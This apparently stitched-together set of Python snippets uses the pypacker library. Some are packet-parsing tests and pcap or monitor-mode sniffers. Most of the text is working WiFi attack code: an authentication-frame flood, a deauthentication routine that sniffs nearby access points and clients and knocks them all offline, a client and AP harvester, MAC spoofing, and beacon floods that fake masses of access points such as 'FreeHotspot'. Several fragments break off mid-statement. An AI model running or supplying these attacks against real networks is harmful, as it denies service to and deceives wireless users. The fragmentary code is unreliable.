def test_radiotap_packet_filter_and_parse_parsing_wrong_encapsulation( marine_or_marine_pool: Union[Marine, MarinePool] ): src_ip = "78.78.78.255" dst_ip = "10.0.0.255" expected_output = { "radiotap.present.tsft": None, "radiotap.present.channel": None, "radiotap.present.rate": None, "wlan.fc.type_subtype": None, "llc.type": None, "ip.src": None, "ip.dst": None, } packet = ( radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK) + ieee80211.IEEE80211(framectl=0x8801) + ieee80211.IEEE80211.Dataframe(sec_param=None) + llc.LLC( dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big") ) + ip.IP(src_s=src_ip, dst_s=dst_ip) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=None, display_filter=None, field_templates=None, expected_passed=True, expected_output=expected_output, )
def test_radiotap_packet_filter_and_parse_with_auto_encap_in_field_template( marine_or_marine_pool: Union[Marine, MarinePool] ): src_ip = "78.78.78.255" dst_ip = "10.0.0.255" bpf_filter = "ip" display_filter = "ip" field_templates = {"macro.dummy": ["radiotap.present.rate"]} expected_output = { "macro.dummy": 1, "ip.src": src_ip, "ip.dst": dst_ip, } packet = ( radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK) + ieee80211.IEEE80211(framectl=0x8801) + ieee80211.IEEE80211.Dataframe(sec_param=None) + llc.LLC( dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big") ) + ip.IP(src_s=src_ip, dst_s=dst_ip) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=None, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=field_templates, expected_passed=True, expected_output=expected_output, )
def wifi_authdos_cb(pargs): """ Authentication frames DoS """ radiotap_ieee80211 = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst) radiotap_ieee80211_auth = radiotap_ieee80211 + auth psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) channel = int(pargs.channels.split(",")[0]) logger.debug("sending %d deauth to %r on channel %d", pargs.count, pargs.mac_dst, channel) utils.switch_wlan_channel(pargs.iface_name, int(pargs.channels.split(",")[0])) for cnt in range(pargs.count): if cnt & 15 == 0: print(".", end="") sys.stdout.flush() auth.src = pypacker.get_rnd_mac() try: psock_send.send(radiotap_ieee80211_auth.bin()) except socket.timeout: # timeout on sending? that's ok pass print("") psock_send.close()
def test_radiotap_packet_filter_and_parse_failing_wrong_encapsulation( marine_or_marine_pool: Union[Marine, MarinePool] ): src_ip = "78.78.78.255" dst_ip = "10.0.0.255" bpf_filter = "ip" display_filter = "ip" packet = ( radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK) + ieee80211.IEEE80211(framectl=0x8801) + ieee80211.IEEE80211.Dataframe(sec_param=None) + llc.LLC( dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big") ) + ip.IP(src_s=src_ip, dst_s=dst_ip) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=None, expected_passed=False, expected_output={}, )
def show_pcap(fname, cnt=1000): """ Read cnt packets from a pcap file, default: 1000 """ f = open(fname, "rb") pcap = ppcap.Reader(f) cnt = 0 for ts, buf in pcap: cnt += 1 """ if cnt > 1: continue """ print(">>> read packet %d" % cnt) rt = radiotap.Radiotap(buf) print("%r" % rt) print("%r" % rt.ieee80211) try: print("%r" % rt.ieee80211.dataframe) except: try: print("%r" % rt.ieee80211.assocreq) except: try: print("%r" % rt.ieee80211.beacon) except: try: print("%r" % rt.ieee80211.proberesp) except: try: print("%r" % rt.ieee80211.probereq) except: print("%r" % rt.ieee80211.assocresp) f.close()
from pypacker import psocket from pypacker.layer12 import ieee80211, radiotap import time wlan_monitor_if = "wlan1" wlan_reader = psocket.SocketHndl(iface_name=wlan_monitor_if, timeout=999) print("please wait for wlan traffic to show up") aps_found = {} time_start = time.time() for i in range(100000): raw_bytes = wlan_reader.recv() drvinfo = radiotap.Radiotap(raw_bytes) if i % 1000 == 0: print("packets/s: %d" % (i / (time.time() - time_start))) try: beacon = drvinfo[ieee80211.IEEE80211.Beacon] if beacon is None: continue mac_ap = beacon.src1_s # print(beacon) ie_ssid = beacon.params[0].data # signal = 0xffffffff ^ drvinfo.dids[3].value
linktype=ppcap.DLT_IEEE802_11_RADIO) # pcapwriter = ppcap.Writer(filename="parsefail.pcap") raw_bytes = b"" cnt = 0 time_start = time.time() while True: if cnt % 1000 == 0: print("%d pps" % (cnt / (time.time() - time_start))) cnt = 0 time_start = time.time() cnt += 1 try: raw_bytes = sockhndl.recv() pkt = radiotap.Radiotap(raw_bytes) # pkt = ethernet.Ethernet(raw_bytes) # pkt = linuxcc.LinuxCC(raw_bytes) # print(pkt) # print(pkt.body_handler) if pkt[ip.IP] is not None: tmp = pkt[ip.IP].src_s tmp = pkt[ip.IP].dst_s tmp = pkt[ip.IP].body_handler.body_handler pkt.dissect_full() raw_bytes = pkt.bin() # pcapwriter.write(raw_bytes) except socket.timeout: pass
from pypacker.layer12 import radiotap, ieee80211 from pypacker import psocket # name of monitor interface to use wlan_monitor_if = sys.argv[1] # MAC address of access point ap_mac = sys.argv[2] print("interface/ap: %s %s" % (wlan_monitor_if, ap_mac)) utils.set_wlan_monmode(wlan_monitor_if, monitor_active=False, reactivate=False) utils.set_ethernet_address(wlan_monitor_if, "24:77:03:01:5C:8D") utils.set_wlan_monmode(wlan_monitor_if, monitor_active=True) psocket = psocket.SocketHndl(wlan_monitor_if) auth_req_orig = radiotap.Radiotap() +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) +\ ieee80211.IEEE80211.Auth(dst_s=ap_mac, bssid_s=ap_mac) beacon_orig = radiotap.Radiotap() +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) +\ ieee80211.IEEE80211.Beacon( params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")] ) def send_auth(mac): """Send authentications to ap having mac 'mac'"""
def harvest(psock, mode, aps=None, known_clients=None, harvest_time_ch=5): """ harvest_time_ch -- time to harvest per channel in seconds return -- set(ap_mac | client_macs) """ found = set() for channel in channels: utils.switch_wlan_channel(psock.iface_name, channel) print("setting channel: %d" % channel) time_start = time.time() clients_seen = {} cnt = 0 # TODO: to be tuned while (time.time() - time_start) < harvest_time_ch: try: try: raw_bytes = psock.recv() except: # assume timeout: switch channel break cnt += 1 drvinfo = radiotap.Radiotap(raw_bytes) if cnt % 1000 == 0: print("packets/s: %d" % (cnt / (time.time() - time_start))) if mode == HARVEST_MODE_AP: beacon = drvinfo[ieee80211.IEEE80211.Beacon] if beacon is None: continue if beacon.bssid_s not in found: logger.info( "found AP: %18s %-40s %-10s" % (beacon.bssid_s, utils.get_vendor_for_mac( beacon.bssid_s[0:8]), beacon.params[0].data)) found.add(beacon.bssid_s) elif mode == HARVEST_MODE_CLIENT: dataframe = drvinfo[ieee80211.IEEE80211.Dataframe] if dataframe is None: continue src = dataframe.src_s if src in aps: # not interested in aps continue if src not in found: logger.info("found new client: %s" % src) found.add(src) elif mode == HARVEST_MODE_CLIENT_LIST: try: src = drvinfo[ieee80211.IEEE80211]._body_handler.src_s if src in known_clients: # TODO: signal strength # print(src) found.add(src) except AttributeError as e: pass # print(e) except Exception as e: print(e) for k in found: # os.system("clear") print("%s -> (%r)" % (k, str(known_clients[k]))) else: print("wrong harvest mode") return None except Exception as e: print(e) return found
def wifi_deauth_cb(pargs): """ Deauth everyone and everything """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) logger.debug("using channels: %r", channels) psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2, timeout=1) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) # {channel : {b"AP" : set(b"clients", ...)}} wdata = collections.defaultdict(lambda: collections.defaultdict(set)) # thread: socket1: listen for traffic, extract ap/client macs def listen_cycler(pargs_ref): while pargs_ref.is_running: try: rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0] except (IndexError, socket.timeout, OSError): logger.debug("no packets received..") continue try: pkt_ieee80211 = rtap.ieee80211 except Exception as ex: logger.warning(ex) # TODO: use channel info from radiotap? if pkt_ieee80211.is_beacon(): bssid = pkt_ieee80211.beacon.bssid if bssid in pargs.macs_excluded: #logger.debug("excluding AP: %r", bssid) continue # don't overwrite already stored client MACs if bssid not in wdata[pargs.current_channel]: # logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid)) wdata[pargs.current_channel][bssid] = set() for client in pkt_ieee80211.extract_client_macs(): bssid = pkt_ieee80211.upper_layer.bssid if bssid in pargs.macs_excluded: #logger.debug("excluding AP: %r", bssid) continue if client in pargs.macs_excluded or\ client in wdata[pargs.current_channel][bssid]: #logger.debug("excluding client: %r", bssid) continue # logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client)) wdata[pargs.current_channel][bssid].add(client) pargs.is_running = True pargs.current_channel = channels[0] layer_radiotap = radiotap.Radiotap() layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_DEAUTH) layer_deauth = ieee80211.IEEE80211.Deauth() pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth thread_listen = threading.Thread(target=listen_cycler, args=[pargs]) thread_listen.start() logger.info("first round slow start..") for cnt in range(pargs.count): seq = 0 layer_deauth.seq = seq if not pargs.is_running: break for channel in channels: # skip non-traffic channels if cnt > 0 and len(wdata[channel]) == 0: #logger.debug("skipping channel %d", channel) continue utils.switch_wlan_channel(pargs.iface_name, channel) pargs.current_channel = channel try: time.sleep(0.4 if cnt == 0 else 0.05) except KeyboardInterrupt: pargs.is_running = False break logger.info( "deauth on channel %3d (%3d APs, %3d clients, round %4d)", channel, len(wdata[channel]), sum(len(clients) for ap, clients in wdata[channel].items()), cnt) # TODO: quite slow aps = list(wdata[channel].keys()) for mac_ap, macs_clients in [[ap, wdata[channel][ap]] for ap in aps]: layer_deauth.seq += 1 layer_deauth.src = mac_ap layer_deauth.bssid = mac_ap if not pargs.nobroadcast: # reset src/dst for broadcast layer_deauth.dst = b"\xFF" * 6 # TODO: increase? # logger.debug("deauth AP: %r", mac_ap) for _ in range(5): layer_deauth.seq += 1 psock_send.send(pkt_deauth.bin()) for mac_client in list(macs_clients): # logger.debug("deauth client: %r", mac_client) layer_deauth.dst = mac_client for _ in range(2): layer_deauth.seq += 1 psock_send.send(pkt_deauth.bin()) psock_send.close() psock_rcv.close()
def wifi_ap_ie_cb(pargs): """ Create fake APs using various IEs """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) beacon_orig = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \ ieee80211.IEEE80211.Beacon( dst=b"\xFF\xFF\xFF\xFF\xFF\xFF", src=b"\xFF\xFF\xFF\xFF\xFF\xFF", params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"), ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16), ] ) beacon = copy.deepcopy(beacon_orig) _beacon = beacon[ieee80211.IEEE80211.Beacon] mac = pypacker.get_rnd_mac() essid = "012" _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = bytes(essid, "ascii") _beacon.params[0].len = len(essid) _beacon.params[2].body_bytes = pack_B(channels[0]) _beacon.seq = 0 # adaptive sleeptime due to full buffer on fast sending sleeptime = 0.000001 pargs.is_running = True logger.info("faking APs on the following channels %r", channels) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) ie_cnt = 0 pkt_cnt = 0 PACKETS_PER_CHANNEL = 3 for _ in range(pargs.count): if not pargs.is_running: break for channel in channels: if pkt_cnt % (256) == 0: print("%d packets sent, ch: %d \r" % (pkt_cnt, channel), end="") sys.stdout.flush() _beacon.params[2].body_bytes = pack_B(channel) utils.switch_wlan_channel(pargs.iface_name, channel) #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes) pkt_cnt += 256 try: for ie_id in range(256): _beacon.params[5].id = ie_id mac = pypacker.get_rnd_mac() _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = get_random_essid() _beacon.params[0].len = len(_beacon.params[0].body_bytes) for _ in range(PACKETS_PER_CHANNEL): _beacon.seq = ie_id # _beacon.ts = x << (8*7) _beacon.ts = ie_id * 20 # time.sleep(0.01) psock_send.send(beacon.bin()) time.sleep(sleeptime) except socket.timeout: # timeout on sending? that's ok pass except OSError: sleeptime *= 10 print() logger.warning( "buffer full, new sleeptime: %03.6fs, waiting...", sleeptime) time.sleep(1) ie_cnt = (ie_cnt + 1) & 0xFF psock_send.close()
def wifi_ap_cb(pargs): """ Create a massive amount of fake APs """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) beacon_orig = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \ ieee80211.IEEE80211.Beacon( dst=b"\xFF\xFF\xFF\xFF\xFF\xFF", src=b"\xFF\xFF\xFF\xFF\xFF\xFF", params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")]) beacon = copy.deepcopy(beacon_orig) _beacon = beacon[ieee80211.IEEE80211.Beacon] mac = pypacker.get_rnd_mac() essid = "FreeHotspot" _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = bytes(essid, "ascii") _beacon.params[0].len = len(essid) _beacon.params[2].body_bytes = pack_B(channels[0]) _beacon.seq = 0 _beacon.interval = 0xFFFF # adaptive sleeptime due to full buffer on fast sending sleeptime = 0.000001 rand_mac = True rand_essid = True pargs.is_running = True logger.info("faking APs on the following channels %r", channels) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) cnt = 0 rounds = 0 PACKETS_PER_CHANNEL = 3 starttime = time.time() _beacon.params[2].body_bytes = pack_B(channels[0]) utils.switch_wlan_channel(pargs.iface_name, channels[0]) for _ in range(pargs.count): if not pargs.is_running: break if cnt & 0xF == 0: print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="") sys.stdout.flush() if time.time() - starttime > 60: rounds += 1 cnt = 0 cnt_bts = unpack_I(cnt)[0][-3:] cnt += 1 if rand_mac: mac = pypacker.get_rnd_mac()[:3] + cnt_bts _beacon.src = mac _beacon.bssid = mac if rand_essid: _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts _beacon.params[0].len = len(_beacon.params[0].body_bytes) try: _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL for cnt_ap in range(PACKETS_PER_CHANNEL): # send multiple beacons for every ap psock_send.send(beacon.bin()) _beacon.seq += 1 _beacon.ts += 0x100 #time.sleep(sleeptime) except socket.timeout: # timeout on sending? that's ok pass except OSError: sleeptime *= 10 print() logger.warning("buffer full, new sleeptime: %03.6fs, waiting...", sleeptime) time.sleep(1) psock_send.close()